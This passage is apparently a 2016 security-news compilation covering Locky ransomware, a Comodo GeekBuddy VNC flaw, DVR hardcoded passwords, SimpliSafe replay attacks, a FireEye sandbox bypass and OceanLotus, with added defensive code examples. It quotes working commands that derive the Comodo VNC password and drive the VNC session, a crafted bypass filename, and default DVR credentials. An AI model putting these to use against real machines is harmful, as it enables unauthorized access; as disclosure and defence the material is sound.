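VICTIM_LOG = [
    _line(f"203.0.113.{i}", "19/Feb/2016:10:00:00 +0000", "GET", f"/?p={i}",
          f"WordPress/4.4.2; http://blog{i}.example")
    for i in range(1, 31)
] + [_line("198.51.100.7", "19/Feb/2016:10:00:01 +0000", "GET", "/",
           "Mozilla/5.0 (X11; Linux x86_64)")]

# Constructed sample for a reflector: one attacker IP issuing pingback.ping calls.
REFLECTOR_LOG = [
    _line("192.0.2.9", "19/Feb/2016:09:59:58 +0000", "POST", "/xmlrpc.php", "python-requests/2.9"),
    _line("192.0.2.9", "19/Feb/2016:09:59:59 +0000", "POST", "/xmlrpc.php", "python-requests/2.9"),
    _line("198.51.100.7", "19/Feb/2016:09:59:59 +0000", "GET", "/about/", "Mozilla/5.0"),
]

if __name__ == "__main__":
    print(analyze_inbound(VICTIM_LOG, rps_threshold=25, min_distinct_ips=20))
    print(xmlrpc_posts(REFLECTOR_LOG))
```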



References:

https://blog.sucuri.net/2016/02/wordpress-sites-leveraged-in-ddos-campaigns.html?utm_campaign=WordPress%20Sites%20Leveraged%20in%20Layer%207%20DDoS%20Campaigns%20blogpost&utm_medium=social&utm_source=linkedin
https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
http://www.securityweek.com/wordpress-sites-used-power-layer-7-ddos-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29
http://news.softpedia.com/news/26-000-wordpress-sites-leveraged-in-layer-7-ddos-attack-500552.shtml
http://www.tweaktown.com/news/50500/26k-wordpress-sites-attacked-clever-layer-7-ddos-attack/index.html


How Just Opening an MS Word Doc Can Hijack Every File On Your System
19.2.2016 Hacking
If you receive a mail masquerading as a company's invoice and containing a Microsoft Word file, think twice before clicking on it.
Doing so could cripple your system and could lead to a catastrophic destruction.
Hackers are believed to be carrying out social engineering hoaxes, using eye-catching subjects in spam emails and compromised websites to lure victims into installing a deadly ransomware, dubbed "Locky," on their systems.
So if you find files with the .locky extension on your network shares, congratulations! You are infected and left with just two options: rebuild your PC from scratch or pay the ransom.
Locky ransomware is spreading at the rate of 4000 new infections per hour, which means approximately 100,000 new infections per day.
Microsoft MACROS are Back
It is hard to digest the fact that, in 2016, even a single MS Word document can compromise your system by enabling 'Macros.'
This is where you have to appreciate the hackers' sheer tactical ingenuity.
Locky ransomware is being distributed via Microsoft 365 or Outlook in the form of an invoice email attachment (a Word file that embeds malicious macro functions).
The concept of macros dates back to the 1990s. You must be familiar with this message: "Warning: This document contains macros."
Now macros are back, as cyber criminals have discovered a new way to get internet users to open Microsoft Office documents, especially Word files, that allow macros to run automatically.
How Does Locky Work?
When a user opens the malicious email, the Word document is downloaded to the system. The danger comes when the user opens the file, finds its content scrambled and sees a popup that says "enable macros".
Here comes the bad part:
Once the victim enables the (malicious) macro, it downloads an executable from a remote server and runs it.
This executable is nothing but the Locky ransomware, which, when started, begins to encrypt all the files on your computer as well as on the network.
Locky ransomware affects nearly all file formats, encrypts all the files and replaces each filename with one carrying the .locky extension.
Once encryption is done, the ransomware displays a message instructing victims to download Tor and visit the attacker's website for further instructions and payment.
Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key.
One interesting note on Locky is that it is being translated into many languages, which extends its reach beyond English-speaking countries to maximize the number of victims.
Locky Encrypts Even Your Network-Based Backup Files
The new ransomware also has the capability to encrypt your network-based backup files. So it's time for you to keep your sensitive and important files in third-party storage as a backup plan in order to evade future ransomware infections.
Researcher Kevin Beaumont, along with Larry Abrahms of BleepingComputer, initially discovered the existence of the Locky encryption virus.
To check the impact of Locky, Kevin successfully intercepted the Locky traffic yesterday and realized that the cryptovirus is spreading rapidly in the wild.
"I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of Million PCs will be infected," Kevin said in a blog post.
One hour of infection statistics showed that the most affected countries include Germany, the Netherlands, the United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia.


Comodo Internet Security opened your PC to attackers
19.2.2016 Hacking

Comodo Internet Security, in the default configuration, installs an application called GeekBuddy that also installs a VNC server enabled by default.
Researchers from Google's Project Zero team have found another serious security issue in Comodo's protection software: a VNC server enabled by default with an easy-to-guess password. It is the second problem discovered in a Comodo solution in less than a month; a few days ago the Google expert Tavis Ormandy discovered a significant flaw in the Chromodo browser, which has the ‘Same Origin Policy’ (SOP) disabled by default, a setting that puts users at risk.

Every time users install one of the Comodo solutions (Comodo Anti-Virus, Comodo Firewall, or Comodo Internet Security) on a Windows PC, a program called GeekBuddy is installed too. Comodo uses this application to carry out remote technical support on the machine.

The GeekBuddy software installs a VNC server that is enabled by default and runs with admin-level privileges. The VNC server is open to the local network and is not protected by any authentication mechanism.

In practice, an attacker could gain full control over a computer running the Comodo software.

“Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall, and Comodo Internet Security, runs a passwordless, background VNC server and listens for incoming connections. This can allow for at least local privilege escalation on several platforms. It also may be remotely exploitable via CSRF-like attacks utilizing a modified web-based VNC client (eg. a Java VNC client).” wrote Jeremy Brown in a blog post published on Packet Storm Security.

Users can fix the issue by enabling password protection, but according to Ormandy the generated passwords are predictable.

“This is an obvious and ridiculous local privilege escalation, which apparently Comodo believes they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn’t prevent the attack they claim it solves,” explained Ormandy.

The password is easy to extract from the Windows Registry; the operation could be performed by any logged-in user or by malware running on the machine.

Ormandy also explained how to calculate the password, using the Windows calc.exe as a demonstration.

This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this:

$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption SerialNumber Signature TotalTracks
VMware, VMware Virtual S SCSI Disk Device -135723213 1997160

$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
7d4612e5

$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -

I'm using vncdotool from here:

https://github.com/sibson/vncdotool

(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)

Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):

$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3

Ormandy reported the issue to Comodo on January 19; on February 10 the company released a fix in version 4.25.380415.167 of GeekBuddy.


Tens of thousands of DVRs exposed on Internet with Hardcoded Passwords

19.2.2016 Hacking

According to a report published by Risk Based Security, tens of thousands of DVRs are exposed on the Internet with a hardcoded password.
According to the report by Risk Based Security (RBS), the firmware of DVRs manufactured by China-based Zhuhai RaySharp contains hardcoded credentials that could be used by a remote attacker to gain control of the devices.

“DVRs based on the Zhuhai RaySharp DVR firmware provide a web-based management interface for users to manage the device, view feeds from connected surveillance cameras, and use the PTZ (Pan-Tilt-Zoom) controls. It was found that the interface contains hardcoded credentials that allow anyone to easily access the device.” states the report.

The digital video recorders include a web interface that allows users to manage the devices, access the recorded video, and control surveillance cameras.

Access to the devices is very simple: they are all configured with the same username, “root”, and the same password, “519070”.

There are tens of thousands of digital video recorders (DVRs) exposed on the Internet: security experts at Risk Based Security used Shodan and found between 36,000 and 46,000 DVRs accessible from the web, most of them located in the US.


The security issue is much broader: according to the experts, many other vendors worldwide (including Defender, Lorex, KGuard Security, König, Swann, and COP USA) sell digital video recorders using firmware affected by this vulnerability (CVE-2015-8286).

Experts at Risk Based Security reported the vulnerability to US-CERT in September 2015, which notified all affected vendors in October. Some vendors are working on their own patches, but many of them still haven’t solved the problem, and RaySharp has yet to release a fix.

The problem affecting these DVRs is quite common among IoT devices: poor configuration exposes them to cyber attacks.


Using SimpliSafe Home Security? — You're Screwed! It's Easy to Hack & Can't be Patched
18.2.2016 Vulnerebility
If you are using a SimpliSafe wireless home alarm system to improve your home security the smart way, just throw it out and buy a new one. It is useless.
The so-called 'smart' technology, which is designed to make your home safer, is actually opening your house doors to hackers. The latest in this field is the SimpliSafe alarm.
SimpliSafe wireless home alarm systems – used by more than 300,000 customers in the United States – are Hell Easy to Hack, allowing an attacker to easily gain full access to the alarm and disable the security system, facilitating unauthorized intrusions and thefts.
…and the most interesting reality is: You Can Not Patch it!
As the Internet of Things (IoT) is growing at a great pace, it continues to widen the attack surface at the same time.
Just last month, a similar hack was discovered in Ring – a smart doorbell that connects to the user's home WiFi network – that allowed researchers to obtain the home user's WiFi password.
How to Hack SimpliSafe Alarms?
According to IOActive senior security consultant Andrew Zonenberg, who discovered this weakness, anyone with basic hardware and software costing between $50 and $250 can harvest the alarm's PIN and turn the alarm off from up to 200 yards (30 meters) away.
Since the SimpliSafe alarm uses unencrypted communications over the air, a thief loitering near a home with some radio equipment could sniff the unencrypted PIN messages transferred from the keypad to the alarm control box when the house owner deactivates the alarm.
The attacker then records the PIN code in the microcontroller board's memory (RAM) and later replays it to disable the compromised alarm and carry out burglaries when the owners are away from home.
Moreover, the attacker could also send spoofed sensor readings, such as "back door closed", in an attempt to fool the alarm into thinking no break-in is happening.
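The weakness above is a replay problem: a PIN sent in the clear is accepted again whenever it is resent. The following toy model (an added example, not SimpliSafe's protocol or IOActive's code) puts the plain PIN frame beside the kind of frame Zonenberg says a firmware fix would have added, an HMAC over a monotonic counter, and shows that the same captured frame disarms the first design twice but the second only once; the pairing key and PIN are constructed, and the same tag would cover sensor-status frames.

```python
import hashlib
import hmac
import struct

# Constructed secret shared by one keypad/base-station pair; in a real design it
# would be provisioned at pairing time and never transmitted.
PAIR_KEY = b"constructed-pairing-key-for-demo"
TAG_LEN = 16      # truncated HMAC-SHA256 tag, bytes
CTR_LEN = 4       # big-endian monotonic counter, bytes


def plain_disarm_frame(pin):
    """The weak design the article describes: the PIN itself goes over the air."""
    return b"DISARM:" + pin.encode()


def plain_base_accepts(frame, stored_pin):
    """A base station that only compares the PIN accepts the same frame forever,
    so a captured frame can be replayed at any later time."""
    return hmac.compare_digest(frame, b"DISARM:" + stored_pin.encode())


class AuthKeypad:
    """Keypad side of a replay-resistant frame: counter || HMAC(key, op || counter || PIN).
    The PIN never leaves the keypad in the clear."""

    def __init__(self, key, pin):
        self.key, self.pin, self.counter = key, pin, 0

    def disarm_frame(self):
        self.counter += 1                 # never reused; would persist across power cycles
        ctr = struct.pack(">I", self.counter)
        tag = hmac.new(self.key, b"DISARM" + ctr + self.pin.encode(), hashlib.sha256).digest()
        return ctr + tag[:TAG_LEN]


class AuthBase:
    """Base-station side: recompute the tag with the stored PIN and reject any
    counter that is not strictly greater than the last accepted one."""

    def __init__(self, key, stored_pin):
        self.key, self.stored_pin, self.last_counter = key, stored_pin, 0

    def accepts(self, frame):
        if len(frame) != CTR_LEN + TAG_LEN:
            return False
        ctr_bytes, tag = frame[:CTR_LEN], frame[CTR_LEN:]
        ctr = struct.unpack(">I", ctr_bytes)[0]
        if ctr <= self.last_counter:      # replayed or stale frame
            return False
        expected = hmac.new(self.key, b"DISARM" + ctr_bytes + self.stored_pin.encode(),
                            hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):   # wrong PIN, wrong key or tampered
            return False
        self.last_counter = ctr
        return True


def demo():
    """Replay one captured frame against both designs.
    Returns (plain_replay_accepted, authenticated_replay_accepted)."""
    captured = plain_disarm_frame("1234")
    plain_ok = plain_base_accepts(captured, "1234") and plain_base_accepts(captured, "1234")
    keypad, base = AuthKeypad(PAIR_KEY, "1234"), AuthBase(PAIR_KEY, "1234")
    captured = keypad.disarm_frame()
    first = base.accepts(captured)        # genuine disarm: accepted
    replay = base.accepts(captured)       # same bytes again: rejected
    return plain_ok, first and replay


if __name__ == "__main__":
    print(demo())   # (True, False)
```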
Video Demonstration of the Hack
A video demonstration shows the hack in action:

"Unfortunately, there's no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening," Zonenberg explains.
Here's Why Your Smart Alarms are Unpatchable
Besides using an unencrypted channel, SimpliSafe also uses a one-time programmable chip in its wireless home alarm, leaving no option for an over-the-air update.
"Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol," Zonenberg adds. But, "this isn't an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable."
This means there is no patch coming for your SimpliSafe alarm, leaving you and more than 300,000 other homeowners with no solution other than to stop using SimpliSafe alarms and buy another wireless alarm system.
Zonenberg said he has contacted the Boston-based smart alarm provider several times since September 2015, but the manufacturer has not yet responded to the issue. So he finally reported it to US-CERT.


VXE Flaw allowed threats to bypass FireEye detection engine
18.2.2016 Vulnerebility

Researchers at Blue Frost Security firm discovered a flaw in the FireEye Virtual Execution Engine (VXE) that allows an attacker to completely bypass virtualization-based dynamic analysis and whitelist malware.
Security researchers at Blue Frost Security have found a high severity vulnerability in FireEye products that allowed an attacker to bypass the company’s detection engine and temporarily whitelist malware.

The experts reported the flaw to FireEye in September 2015; the company promptly patched the issue and released an update of the FireEye Operating System (FEOS). FireEye also asked Blue Frost to wait until mid-February to disclose the flaw because many customers had still not applied the updates.

The flaw resides in FireEye’s Virtual Execution Engine (VXE), a crucial component of the defense solutions that performs dynamic analysis on files. The component is used in several products of the FireEye portfolio, including FireEye Network Security (NX), Email Security (EX), Malware Analysis (AX), and File Content Security (FX).


Every time FireEye’s Virtual Execution Engine analyzes a Windows binary, it copies it into a virtual machine under the name “malware.exe.” Before the file is analyzed, the engine runs a batch script that copies the binary to a temporary location and renames it to its original filename.

The experts discovered that the software doesn’t sanitize the original filename, allowing an attacker to use Windows environment variables inside the original filename, which are resolved inside the batch script.

“FireEye is employing the Virtual Execution Engine (VXE) to perform a dynamic analysis. In order to analyze a binary, it is first placed inside a virtual machine. A Windows batch script is then used to copy the binary to a temporary location within the virtual machine, renaming it from “malware.exe” to its original file name.

copy malware.exe "%temp%\fire_in_the_eye.exe"
No further sanitization of the original filename is happening which allows an attacker to use Windows environment variables inside the original filename which are resolved inside the batch script. Needless to say this can easily lead to an invalid filename, letting the copy operation fail.” states the security advisory from Blue Frost.

“Let’s take the filename FOO%temp%BAR.exe which results in:

copy malware.exe "%temp%\FOOC:\Users\admin\AppData\Local\TempBAR.exe"
The filename, directory name, or volume label syntax is incorrect.
0 file(s) copied.
The batch script continues and tries to execute the binary under its new name which of course will fail as well because it does not exist.”

The batch script then attempts to execute the file in the virtual machine while monitoring for malicious behavior, but the invalid filename has already caused the copy operation to fail. As a result, the file is never executed and the engine is not able to detect any malicious activity. At this point the Virtual Execution Engine considers the file clean and adds its MD5 hash to a whitelist of binaries that have already been analyzed and will not be analyzed again until the next day.

“Once a binary was analyzed and did not show any malicious behavior, its MD5 hash is added to an internal list of binaries already analyzed. If a future binary which is to be analyzed matches an MD5 hash in this list, the analysis will be skipped for that file. The MD5 hash will stay in the white list until it is wiped after a day.” Blue Frost Security said in its advisory. “This effectively allows an attacker to whitelist a binary once and then use it with an arbitrary file name in a following attack. The initial binary with the environment variable embedded in its filename could e.g. be hidden in a ZIP file together with several other benign files and sent to an unsuspicious email address. Once this ZIP file was downloaded or sent via email a single time, the MD5 hash of the embedded malware would be whitelisted and the binary could then be used with an arbitrary file name without detection.”
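The two defects the advisory describes, an unsanitized filename pasted into a batch script and an analysis error treated as a clean verdict, are modelled below in an added example that is neither FireEye's nor Blue Frost's code. It simulates how cmd.exe expands %VAR% tokens in the copy line (the FOO%temp%BAR.exe case from the advisory), puts a rejecting sanitizer beside it, and shows a verdict function that never whitelists a sample that did not actually run; the environment values are constructed.

```python
import hashlib
import re

# %NAME% tokens as a batch script sees them. The model ignores %% escaping and
# !delayed! expansion, which the one-line script in the advisory does not use.
ENV_VAR_RE = re.compile(r"%([^%\s]+)%")


def expand_batch_vars(text, env):
    """Expand %NAME% as a batch script would: names are case-insensitive and an
    undefined name expands to the empty string."""
    lookup = {k.lower(): v for k, v in env.items()}
    return ENV_VAR_RE.sub(lambda m: lookup.get(m.group(1).lower(), ""), text)


def vxe_copy_line(original_name, env):
    """The vulnerable step as the advisory describes it: the original filename is
    pasted into the script, so any %VAR% inside it is expanded along with %temp%."""
    script_line = f'copy malware.exe "%temp%\\{original_name}"'
    return expand_batch_vars(script_line, env)


# Characters invalid in a Windows filename, plus the '%' delimiter that makes
# the batch-script injection possible.
UNSAFE_CHARS = set('<>:"/\\|?*%')


def sanitize_filename(name):
    """Accept only a bare filename that cannot change the meaning of the script.
    Anything else is rejected rather than 'fixed', so a crafted name cannot
    steer the sandbox into a failed copy."""
    if not name or name.strip(". ") == "":
        raise ValueError("empty or dot-only filename")
    bad = [c for c in name if c in UNSAFE_CHARS or ord(c) < 32]
    if bad:
        raise ValueError(f"unsafe characters in filename: {bad!r}")
    return name


def safe_copy_line(original_name, env):
    """Hardened counterpart of vxe_copy_line: validate first, then expand."""
    safe_name = sanitize_filename(original_name)
    return expand_batch_vars(f'copy malware.exe "%temp%\\{safe_name}"', env)


def verdict(copy_ok, ran, saw_malicious_behavior):
    """The second half of the bug: a sample that never executed must not be
    reported clean (and therefore must not be MD5-whitelisted)."""
    if not copy_ok or not ran:
        return "error"
    return "malicious" if saw_malicious_behavior else "clean"


def whitelist_hash(whitelist, data, verdict_str):
    """Only a sample that actually ran and looked clean earns an entry in the
    daily MD5 whitelist. Returns whether the hash is now whitelisted."""
    digest = hashlib.md5(data).hexdigest()
    if verdict_str == "clean":
        whitelist.add(digest)
    return digest in whitelist


if __name__ == "__main__":
    env = {"temp": r"C:\Users\admin\AppData\Local\Temp"}   # constructed value
    print(vxe_copy_line("FOO%temp%BAR.exe", env))
    try:
        safe_copy_line("FOO%temp%BAR.exe", env)
    except ValueError as err:
        print("rejected:", err)
```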

FireEye is one of the most important firms in the security industry and immediately worked on security patches (FX 7.5.1, AX 7.7.0, NX 7.6.1 and EX 7.6.2), which have already been released.

“FireEye encourages all customers to update their systems to the latest released version where noted below. FireEye has issued maintenance releases and fixes for all security issues contained within this advisory. ” states the company.

FireEye confirmed that it has not seen any active exploits of the evasion technique against its customers.


A sophisticated variant of OceanLotus trojan targets OS X systems
18.2.2016 Apple

In May 2015, the Chinese security firm Qihoo 360 published a report on a Trojan called OceanLotus that was being used since 2012 for APT attacks in the Chinese market.
The APT attacks based on the OceanLotus focused on government organizations, research institutes, maritime agencies, and companies specializing in other activities.

At the time, four different versions of the Trojan were found, one of which was specifically designed to target OS X systems.


AlienVault analyzed two of these samples for OS X (one of them probably an early version). A more recent variant, uploaded to VirusTotal on February 8, had a zero detection rate at the time; as I write this post the OceanLotus malware is detected by 11 of 55 antivirus solutions, including ESET-NOD32, Ikarus, F-Secure and Bitdefender.

As the title of the article says, the Trojan is disguised as an Adobe Flash Player update.

The developers of the Trojan used XOR encryption because it makes the malware harder to detect. The commands used through the API show that the developers are familiar with OS X, which makes sense because OceanLotus has a version specifically for OS X.

When a system is infected, OceanLotus prepares an agent that attempts to contact its command and control (C&C) servers. Once connected, the Trojan collects information from the infected system, including device name, username and a unique ID, and determines whether the victim has root privileges.

The malware has the capability to perform many tasks, like opening application bundles, returning information about a file or path, getting a list of recently opened documents, obtaining information on active windows, capturing screenshots, downloading files from a URL, executing files, killing a process, and deleting files.

“The OS X version of OceanLotus is clearly a mature piece of malware that is written specifically for OS X. The use of OS X specific commands and APIs is evidence that the authors are intimately familiar with the operating system and have spent quite a bit of time customizing it for the OS X environment. Similar to other advanced malware, the use of obfuscation and indirection within the binary are an indication that the authors want to protect their work, make it difficult for others to reverse engineer, and reduce detection rates. The fact that VirusTotal still shows a zero detection rate for this threat shows they are succeeding at the latter.” states the analysis published by AlienVault.

The AlienVault analysis also provides indicators of compromise (IoCs): sample hashes, C2 domains and the files dropped on an infected system.


Dropped Files:

/Library/.SystemPreferences/.prev/.ver.txt or ~/Library/.SystemPreferences/.prev/.ver.txt

/Library/Logs/.Logs/corevideosd or ~/Library/Logs/.Logs/corevideosd

/Library/LaunchAgents/com.google.plugins.plist or ~/Library/LaunchAgents/com.google.plugins.plist

/Library/Parallels/.cfg or /~Library/Parallels/.cfg

/tmp/crunzip.temp.XXXXXX (passed to mktemp(), so the actual file will vary)

~/Library/Preferences/.fDTYuRs

/Library/Hash/.Hashtag/.hash (or ~/Library/Hash/.Hashtag/.hash)


Ransomware spread in an American hospital, which had to pay 400 thousand in ransom
18.2.2016 Source: Zive.cz
Viruses
Ransomware is one of the most insidious forms of malware: it usually encrypts the data on the disk and demands a ransom, usually paid in Bitcoin, for the key. If an ordinary personal computer is affected, the owner is certainly annoyed, but a similar case has now hit a hospital in Los Angeles, where ransomware caused serious trouble. Patients even had to be moved to nearby hospitals.

The malicious software spread to several computers at Hollywood Presbyterian Medical Center and made patient data and important internal systems inaccessible. After several days, during which the FBI also joined the investigation, the hospital decided to pay the demanded sum. Although initial speculation spoke of millions, the final figure was 40 bitcoins, about 17,000 dollars (413,000 Czech crowns).

Hollywood Presbyterian Medical Center in Los Angeles

Hospitals are a relatively easy target for attackers. A large share of them run outdated operating systems; according to the Ars Technica website this is often Windows 2000, which Microsoft has not patched for several years, not even under extended support.

The traditional demand after infection: pay or you will not get your data back

Ransomware most often spreads as executable applications in e-mail attachments. The basic rule therefore still applies: open only those attachments where there is absolute certainty that they are not malicious software. If the user is not sure how to tell, an antivirus package should not be missing from the system.


Apple defends its encryption in iOS. Facing it are the FBI and the fight against terrorism

18.2.2016 Source: Lupa.cz Mobile

For several months the American FBI has been trying to find leverage to weaken the security of iPhones. So far it has failed in the courts, but in the end the San Bernardino shooting "helped" it.
How to get into a locked iPhone. A case that has once again pitted representatives of the IT world against the American authorities. Apple refuses to break its own protection and unlock the iPhone of one of the San Bernardino shooters for investigators. "It is an unprecedented step that would intrude on the privacy of our users," says Apple chief Tim Cook in a long message to the company's customers.

After the PRISM affair, here is another clash over privacy and the trust that Silicon Valley companies desperately need. The court battle thus has one big theme: should the state's security forces interfere in how IT companies write the code of their programs?

Both sides expect the final verdict to have far-reaching consequences. Apple will probably not remain alone in the fight. Cook's statement was supported, so far only on Twitter, by Google chief Sundar Pichai.

The decision will have an impact on encryption, law enforcement and privacy in the digital environment. At the same time, the more than 200-year-old American law, the All Writs Act of 1789, will probably see changes too. It gives the FBI hope that it could force companies to create spyware and hacking programs aimed at their own users.

Politicians are already getting involved in the case, warming their own popularity on the topic. And they use the universal argument of recent months: the so-called Islamic State. "Apple would rather protect the privacy of dead terrorists than the security of Americans," commented Arkansas senator Tom Cotton, according to The Guardian.

Cook rejects the strong accusation. "We have no sympathy for terrorists, but now the American government wants something from us that we do not have, and moreover something that is very dangerous to create. They want a backdoor into iPhones," counters Apple's chief. The company grafted stronger security onto iOS in 2014, in reaction to the NSA's attempts and the whole PRISM affair.


The fight against terrorism is gradually eating away at internet freedoms, and not only in the United States. Greater control of the digital world is being prepared, for example, in France, which last year became the target of two major terrorist attacks.

During a state of emergency, the authorities there want the option to ban freely available WiFi and connection sharing. Under the proposal, operators of encrypted VoIP communications would also be obliged to hand over encryption keys to the security forces. Effective backdoors for the security forces, however, would also mean exploitability by anyone else.

Efforts to restrict freedom on the internet are appearing in the Czech Republic too. This weekend the Pirates will demonstrate at Klárov in Prague against the Ministry of the Interior's efforts to reduce anonymity on the internet.


Obama: The US is not prepared to fight cyber threats

18.2.2016 Security
The United States is not sufficiently prepared to defend against cyber threats, but this task will largely be a matter for the next president. President Barack Obama said so on Wednesday at a security meeting in the White House.
The president recently decided to set up a special commission to strengthen national cybersecurity, headed by former White House national security adviser Tom Donilon and former IBM chief Sam Palmisano.

At Wednesday's meeting with the two experts, Obama noted that while the internet has brought people many opportunities and wealth, "much about our lives is being downloaded and stored". The question of cybersecurity is a complex and long-term matter. The task of the newly created commission will be to secure government databases and the data repositories of organizations operating in critically important sectors of the economy, the president said.

According to the Reuters agency, Donilon and Palmisano have been commissioned by Obama to submit a proposal for a long-term US internet security strategy by the end of the year.
At the beginning of the year the American government announced that it is creating a new counter-terrorism group whose task will be to fight the propaganda of the Islamic State and other terrorist groups on the internet. The group will be run by the Departments of Homeland Security and Justice with the help of the State Department.


Hollywood Hospital Pays $17,000 Ransom to Hacker for Unlocking Medical Records
18.2.2016 Hacking
Ransomware has turned into a noxious game that lets hackers get paid effortlessly.
Once again the heat was felt by the Los Angeles-based Hollywood Presbyterian Medical Center when a group of hackers locked all its sensitive files and demanded $17,000 to regain access to the compromised data.
The impact of the compromise included:
Compromised emails
Lockout Electronic Medical Record System [EMR]
Encrypted patient data
Inability to carry out CT scans of admitted patients
Transfer of at-risk patients to nearby hospitals
...and many more unexplained consequences.
The hospital confirmed that the ransomware had hit its core systems a week earlier, and the situation had since grown much worse.
Hospital End up Paying $17,000
As the situation grew out of control, the hospital paid 40 Bitcoins (roughly US $17,000) to the ransomware criminals to obtain the decryption keys and resume its medical operations.
"The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key," the hospital CEO Allen Stefanek said in a letter.
All the electronic medical system were restored back soon after unlocking the encrypted file locks.
The Ransomware had stolen the nights of many network administrators, as they would be often blamed to fight up this nasty threat; instead of blaming staffs who click the illegit links in their e-mail.
The FBI Advises Victims to Just Pay the Ransom
Last year, even the FBI advised paying off the Ransom amount to the ransomware criminals as they had not come up with any other alternatives.
Several companies had got webbed in the Ransomware business including a US Police Department that paid US $750 to ransomware criminals three years back.
Criminals often demand the ransom in BTC (their intelligent move) for the surety of not getting caught, as Bitcoin transactions are non-trackable due to its decentralized nature.
So until and unless a permanent solution evolves, users are requested not to click malicious or suspected links sent via an unknown person.
The frequent payment to Ransomware encourages the hackers in the dark to stash the cash and develop a more enticing framework for the next target.
But affecting a medical system is a heinous crime as hospitals are acting as a bridge between life and heaven.


Apple vs. FBI — Google Joins Tim Cook in Encryption Backdoor Battle
18.2.2016 Apple
In the escalating battle between the Federal Bureau of Investigation (FBI) and Apple over iPhone encryption, former National Security Agency (NSA) contractor Edward Snowden and Google chief executive Sundar Pichai have sided with Apple's refusal to unlock an iPhone.
Yesterday, Apple CEO Tim Cook refused to comply with a federal court order to help the FBI unlock an iPhone used by one of the shooters in the San Bernardino, California, mass shooting in December.
Here's What the FBI is Demanding:
Federal officials have asked Apple to build a less secure version of iOS that would let them brute-force the 4-6 digit passcode on the dead shooter's iPhone without the device wiping its data after too many failed attempts.
Cook called the court order a "chilling" demand that "would undermine the very freedoms and liberty our government is meant to protect." He argued that helping the FBI unlock the iPhone would amount to providing an encryption backdoor that would make Apple's products less secure.
Backdoor for Government, Backdoor for All
Apple's worry is that once such a backdoor is created and handed to the FBI, it will sooner or later end up in the hands of malicious hackers who could use it for their own purposes.
Although many politicians, including Donald Trump, have slammed Apple's decision, Google has stepped up and taken a public stand in support of it.
"I agree 100 percent with the courts," Trump said in a statement. "But to think that Apple won't allow us to get into her cell phone, who do they think they are? No, we have to open it up."
Google Sided with Apple
In a series of tweets late Wednesday, Pichai sided with Apple, saying that "forcing companies to enable hacking could compromise users' privacy" and that "requiring companies to enable hacking of customer devices & data could be a troubling precedent."
However, Pichai took more than 12 hours to weigh in on the issue, and only after Edward Snowden had pointed out that Google had not yet spoken up.
"The @FBI is creating a world where citizens rely on #Apple to defend their rights, rather than the other way around," Snowden tweeted on Wednesday. Calling on Google to stand with Apple, he added: "This is the most important tech case in a decade."
Pichai's stance is basically:
Technology companies will hand customer data to law enforcement when legally required to, but they will not build a "backdoor" for the government.
While Pichai's statements are not as forceful as Cook's open letter to customers, Google and Apple evidently agree at least that the federal agencies are asking too much.


Anonymous leaked 18GB of data belonging to the Turkish national police
18.2.2016 Hacking

Members of the Anonymous group have stolen 18GB worth of data belonging to Turkey’s national police force and leaked it online.
The hacktivist collective Anonymous has just released roughly 18GB of sensitive data belonging to Turkey's national police.

The hackers have accessed the database of the Turkish General Directorate of Security (EGM) and leaked the archive on file sharing websites.

Anonymous targeted the Turkish authorities to protest against widespread corruption within the Turkish government.

“Hey Turkey, I have something to show you tomorrow. See, if you fight your citizens, they will bite back. #standby.” states a tweet posted on Sunday by the account @CthulhuSec


A day after the first tweet, the same account shared a link to the archive with the message "Enjoy responsibly".


The link shared points to a page including the links to the archive and the following message:

“I have been asked to release the following files by ROR[RG], who is responsible for collecting them.
The material was taken from the EGM which is the Turkey National Police.
The source has had persistent access to various parts of the Turkish Government infrastructure for the past 2 years and
in light of various government abuses in the past few months, has decided to take action against corruption by releasing this.” reports the page.

Making use of the 17.8 GB of data requires "some knowledge of databases":

“As with everything I share, I do not make any claims for the data. However, please note you may require some knowledge
of databases to be able to properly extrapolate information from this data set. If anyone can make a more accessible
version for the less technically inclined, ping it over to me and I will add it here.”

Anonymous has targeted the Turkish government before: in December 2015 it launched a series of attacks on Turkey's internet, forcing the country to take thousands of websites offline.

The Turkish authorities have not commented on the incident.


Researcher hacks medical devices and the whole hospital with ease
18.2.2016 Hacking

Sergey Lozhkin, a security expert at Kaspersky Lab, demonstrated how easy it is for hackers to compromise medical devices and critical healthcare infrastructure.
The rise of the Internet of Things (IoT) has left devices more connected, but in many cases more vulnerable, than ever before. From car hacking to cyberattacks against the energy sector, it has never been more important for manufacturers and IT teams to adopt a 'security-first' attitude.

Yet despite a steep rise in successful hacks, security is often neglected. In recent research presented at the Security Analyst Summit in Spain, Sergey Lozhkin, a senior security researcher at Kaspersky Lab, turned his attention to hospitals to show how easy it really is for a remote attacker to compromise critical medical infrastructure.

